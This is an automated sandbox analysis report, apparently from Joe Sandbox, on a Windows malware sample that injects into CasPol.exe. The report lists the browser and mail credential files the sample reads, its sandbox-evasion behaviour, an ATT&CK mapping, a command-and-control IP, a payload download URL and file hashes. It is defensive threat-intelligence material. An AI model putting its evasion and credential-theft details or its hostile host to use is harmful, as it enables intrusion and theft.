          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134F328 LdrInitializeThunk,5_2_0134F328
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B78D6 cpuid 1_2_032B78D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4028, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4028, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4028, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          3
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          2
          Obfuscated Files or Information
          LSASS Memory127
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)111
          Process Injection
          1
          Software Packing
          Security Account Manager331
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration1
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Timestomp
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer111
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets241
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common241
          Virtualization/Sandbox Evasion
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
          Process Injection
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 634320 Sample: SecuriteInfo.com.generic.ml... Startdate: 25/05/2022 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 5 other signatures 2->37 7 SecuriteInfo.com.generic.ml.10062.exe 6 35 2->7         started        process3 file4 21 C:\Users\user\AppData\...\p11-kit-trust.dll, PE32+ 7->21 dropped 23 C:\Users\user\AppData\Local\...\System.dll, PE32 7->23 dropped 25 C:\Users\user\AppData\Local\...\lang-1045.dll, PE32 7->25 dropped 27 4 other files (none is malicious) 7->27 dropped 39 Writes to foreign memory regions 7->39 41 Tries to detect Any.run 7->41 11 CasPol.exe 11 7->11         started        15 CasPol.exe 7->15         started        17 CasPol.exe 7->17         started        signatures5 process6 dnsIp7 29 2.56.57.22, 49763, 80 GBTCLOUDUS Netherlands 11->29 43 Tries to steal Mail credentials (via file / registry access) 11->43 45 Tries to harvest and steal browser information (history, passwords, etc) 11->45 47 Tries to detect Any.run 11->47 19 conhost.exe 11->19         started        49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->51 signatures8 process9

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.generic.ml.10062.exe12%VirustotalBrowse
          SecuriteInfo.com.generic.ml.10062.exe7%ReversingLabsWin32.Downloader.GuLoader
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MsMpLics.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\MsMpLics.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\avutil-54.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\avutil-54.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\lang-1045.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\lang-1045.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll3%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://mglNPC.com0%Avira URL Cloudsafe
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://subca.ocsp-certum.com050%Avira URL Cloudsafe
          http://ocsp.thawte.com00%Avira URL Cloudsafe
          http://subca.ocsp-certum.com020%Avira URL Cloudsafe
          http://subca.ocsp-certum.com010%Avira URL Cloudsafe
          http://2.56.57.22/yendexoriginwithoutfilter_rtSDhNF87.bin0%Avira URL Cloudsafe
          http://www.avast.com0/0%Avira URL Cloudsafe
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://2.56.57.22/yendexoriginwithoutfilter_rtSDhNF87.bintrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://mglNPC.comCasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://127.0.0.1:HTTP/1.1CasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://DynDns.comDynDNSCasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.certum.pl/ctsca2021.crl0oSecuriteInfo.com.generic.ml.10062.exefalse
            high
            http://creativecommons.org/licenses/by-sa/4.0/folder-publicshare.png.1.drfalse
              high
              http://repository.certum.pl/ctnca.cer09SecuriteInfo.com.generic.ml.10062.exefalse
                high
                http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drfalse
                  high
                  http://repository.certum.pl/ctsca2021.cer0SecuriteInfo.com.generic.ml.10062.exefalse
                    high
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.certum.pl/ctnca.crl0kSecuriteInfo.com.generic.ml.10062.exefalse
                      high
                      http://subca.ocsp-certum.com05SecuriteInfo.com.generic.ml.10062.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.symauth.com/rpa00SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drfalse
                        high
                        http://ocsp.thawte.com0SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://subca.ocsp-certum.com02SecuriteInfo.com.generic.ml.10062.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.nero.comSecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drfalse
                          high
                          http://subca.ocsp-certum.com01SecuriteInfo.com.generic.ml.10062.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.certum.pl/ctnca2.crl0lSecuriteInfo.com.generic.ml.10062.exefalse
                            high
                            http://repository.certum.pl/ctnca2.cer09SecuriteInfo.com.generic.ml.10062.exefalse
                              high
                              http://www.avast.com0/SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.generic.ml.10062.exefalse
                                high
                                http://www.symauth.com/cps0(SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drfalse
                                  high
                                  http://www.certum.pl/CPS0SecuriteInfo.com.generic.ml.10062.exefalse
                                    high
                                    https://github.com/dotnet/runtimeSecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.1.drfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      2.56.57.22
                                      unknownNetherlands
                                      395800GBTCLOUDUStrue
                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:634320
                                      Start date and time: 25/05/202222:41:382022-05-25 22:41:38 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 13m 28s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:SecuriteInfo.com.generic.ml.10062.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected Instruction Hammering
                                      Number of analysed new started processes analysed:26
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@8/14@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 27.8% (good quality ratio 27.4%)
                                      • Quality average: 87.6%
                                      • Quality standard deviation: 21.3%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 125
                                      • Number of non-executed functions: 133
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, tile-service.weather.microsoft.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      TimeTypeDescription
                                      22:44:13API Interceptor2702x Sleep call for process: CasPol.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      2.56.57.22triage_dropped_file.exeGet hashmaliciousBrowse
                                      • 2.56.57.22/yendexoriginwithoutfilter_SHFjLjK121.bin
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      GBTCLOUDUSMZvvoqAUnu.exeGet hashmaliciousBrowse
                                      • 2.58.149.2
                                      SecuriteInfo.com.Trojan.DownloaderNET.386.13539.exeGet hashmaliciousBrowse
                                      • 2.56.57.85
                                      scl7ieH12M.zipGet hashmaliciousBrowse
                                      • 2.58.149.245
                                      LIST_OF_ITEMS.pdf.exeGet hashmaliciousBrowse
                                      • 2.56.56.88
                                      34280976082022052523023453HesapOzeti.exeGet hashmaliciousBrowse
                                      • 2.56.59.101
                                      SecuriteInfo.com.W32.AIDetectNet.01.32611.exeGet hashmaliciousBrowse
                                      • 2.56.59.101
                                      MGZitJpdjaGet hashmaliciousBrowse
                                      • 45.11.15.117
                                      Caso2021113069001049.exeGet hashmaliciousBrowse
                                      • 2.56.57.85
                                      CR2h8EQU7A.exeGet hashmaliciousBrowse
                                      • 2.56.56.114
                                      oqMrsJR28L.exeGet hashmaliciousBrowse
                                      • 2.58.149.2
                                      Swiftcopy.xlsxGet hashmaliciousBrowse
                                      • 2.58.149.200
                                      PO_1529246.exeGet hashmaliciousBrowse
                                      • 2.56.57.85
                                      Invoice.pdf.zipGet hashmaliciousBrowse
                                      • 2.58.149.245
                                      Order Samples.exeGet hashmaliciousBrowse
                                      • 2.56.57.124
                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                      • 2.56.57.22
                                      pdf20220530123725.exeGet hashmaliciousBrowse
                                      • 2.56.57.85
                                      Dekont.exeGet hashmaliciousBrowse
                                      • 2.56.59.101
                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                      • 2.56.59.101
                                      View Payment.exeGet hashmaliciousBrowse
                                      • 2.58.149.2
                                      HSBC-SWIFT-24-05-2022.exeGet hashmaliciousBrowse
                                      • 2.58.149.2
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dllSecuriteInfo.com.generic.ml.10062.exeGet hashmaliciousBrowse
                                        ALuh1ODGq3.exeGet hashmaliciousBrowse
                                          C:\Users\user\AppData\Local\Temp\MsMpLics.dllSecuriteInfo.com.generic.ml.10062.exeGet hashmaliciousBrowse
                                            ALuh1ODGq3.exeGet hashmaliciousBrowse
                                              C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exeSecuriteInfo.com.generic.ml.10062.exeGet hashmaliciousBrowse
                                                ALuh1ODGq3.exeGet hashmaliciousBrowse
                                                  https://3dhhmq.db.files.1drv.com/y4mE24U0E3kTbb1kcnfoE2lhRcOQikkRviwcr5fFIfVswsjrBcbqtNzvbkVurnoRkaA-hfd6G_MGgrcHzcoF1mJEjltHzMJxiu6bwMIRYpaPQH0vhHl0zFDF8Ykg57lX5pCK_o9CQ3XIEIIVsUI3WUMmLkQvqPfWsAB_d9i-3vVi2kQvC2suifY2gyahKqXE02URY3Boxt0pNArjvHnlQqYLg/PO00007852.ISO?download&psid=1Get hashmaliciousBrowse
                                                    PO#23754-1.exeGet hashmaliciousBrowse
                                                      PO#23754-1.exeGet hashmaliciousBrowse
                                                        PO00007852.exeGet hashmaliciousBrowse
                                                          PO00007852.exeGet hashmaliciousBrowse
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1955040
                                                            Entropy (8bit):6.826653374498559
                                                            Encrypted:false
                                                            SSDEEP:49152:T3VwASOuGtlq2fIU6iFm7+BSGYsFoXOh5PGP1T/eacB4dPFPxat:vw+FDKXkuLPxS
                                                            MD5:39981C2A1465413B506246DA3721D9A1
                                                            SHA1:213C41C908F9A7C62C4D5D8079FC17188066CB3B
                                                            SHA-256:19AE2C74ECE76F6AE7074AC31B198D6BF201DDE201B5B31EACA023877241F7B9
                                                            SHA-512:F047681FF16D7C428E39D6A705BDD290B7EA227AC8176E69B989B90297541CD2A596B71673E6DFA0ACB83B201EB815E0518D52169D9FC48C6AEBF78DCB998D7D
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                            • Filename: ALuh1ODGq3.exe, Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            • Filename: PO#23754-1.exe, Detection: malicious, Browse
                                                            • Filename: PO#23754-1.exe, Detection: malicious, Browse
                                                            • Filename: PO00007852.exe, Detection: malicious, Browse
                                                            • Filename: PO00007852.exe, Detection: malicious, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8.}.k.}.k.}.k..Rk.}.k...j.}.k...j.}.k...j.}.k...j.}.k...j.}.k...j.}.k.}.k.|.k.}.k.}.kg..j3|.kf..j.}.kf.>k.}.k.}Vk.}.kf..j.}.kRich.}.k................PE..d....j.`.........."............................@.............................0...........`..................................................c...................................L.....p...........................@................ ...............................text............................... ..`.rdata..*j... ...l..................@..@.data...0e......."...z..............@....pdata..............................@..@.rsrc................b..............@..@.reloc...L.......N...h..............@..B........................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):13978
                                                            Entropy (8bit):7.983903298012058
                                                            Encrypted:false
                                                            SSDEEP:384:g/fHDCOQD/zKzAwhZMiZY79lBpsIyK0Xqv:g/fjdQTzKzBhZMw+lfsIyBW
                                                            MD5:6CEA9045463D0C5D27E1A89AE139E33F
                                                            SHA1:64A5497F8D154AEEF22F7CAC3F72F4D2FC5F9D62
                                                            SHA-256:D532BF8700F1B322DCF738AF6EF2DAB7FE5328DCBA0C4ED04227AF6BA4F1A1BD
                                                            SHA-512:B20D641DD59247BE2E75EA0F96408949EFE40864058B3D0938E3DBFA2F8AC960CB2F2E52E62FBE42DEC2C93EF4D9B89CF44BA31E102C3BBB7C3B726EDE77BACA
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..8S/or.>;.K4C...Z.r7..0Yk.A.>....X\.{....Q...9.2..J|.0.a.8...h.v.m.?X.f.1....F&..y;..3.1../..eH.L.~...@..Fs6H..b..x....AA.q.+.j.z|.....g.&n...9..B.s.........I......R...m.*1...f?........W... ..~}._..M.r.....}}:.......%.7...7....9.........(.$.|r6...~8..3.p!xM2.....m..9..C..Us.8..+.lp+.e'..x.g.....9....x.?.}.q.\...`........0...M'2..}(|.=.uB..k..}..=:.BG\..?.P.a.!.V....v.....?.>.....zG.....d.D.jP..wD.pM..{h....'T.....>Fy.9.K.Q...af....Fq.\...Pe..G.oR.d...a5.|...FPTT{[".;hz`....(....9..r.[]F.$.A+bdz....'&TeQ.G?..7...f.O{.a!!?...[X?.j+.[9 ....QL}!u...1/:>.:6%.6.A....N....#..1.8P.2Q,.QYxk'.2D............C?..g....Y..z3W...h..5..L.i....m..a.5.$.....z...S...'lB..S.....F.e...>.8.....|.6.*.-srN&.]....s.....Lou:z..h..v.-..9.K....^.G.Qc..G.'.s....=U.-...."..ja..7.Oj..[.k,.ti(.-p.|....8..g...y..`......Q`X.....cT.l.*...6.r..$.....&........1J......R.#..-U..h.B..........L../../{Kk.....f....g%......#..["....lj..P..N...F.".0.'..H:U.JowM./L......Q.3
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                            Category:modified
                                                            Size (bytes):966
                                                            Entropy (8bit):3.069177920554261
                                                            Encrypted:false
                                                            SSDEEP:12:8wl0YRsXUCV/tz+7RafgKDq9XKN4mWQ18/rNJkKAh4t2YCBTo8:87raRMgKsK2OS5HALJT
                                                            MD5:54BD2D457F7D4C05C7AFE12B2ABCF87B
                                                            SHA1:A6FA0107D62F273B2C8AE469FE5450F851819934
                                                            SHA-256:87E5DF62B393359F15DE57070A40440C2A84DD4323FA00EC34F66805CCC117C4
                                                            SHA-512:09BCA14D3A0C418791FC8911EA542F5AD14EA0C11BE8D2F88111283223AC85F941E961F1372D934E63BC9BFE50277D731A4662FC3C257F9D7B84D3937CCBA22A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F........................................................?....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....x.2...........Unoppignorated.exe..V............................................U.n.o.p.p.i.g.n.o.r.a.t.e.d...e.x.e...".......\.U.n.o.p.p.i.g.n.o.r.a.t.e.d...e.x.e.".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):20008
                                                            Entropy (8bit):6.8686823517057265
                                                            Encrypted:false
                                                            SSDEEP:384:xWgEHWp1v7S+10QnqiZwtfXbMpBjn0aq8f0DBRJYHClXLRXoS:nEijw8Be1PqspoS
                                                            MD5:797476E8813090CC62D574BB9B59F2DD
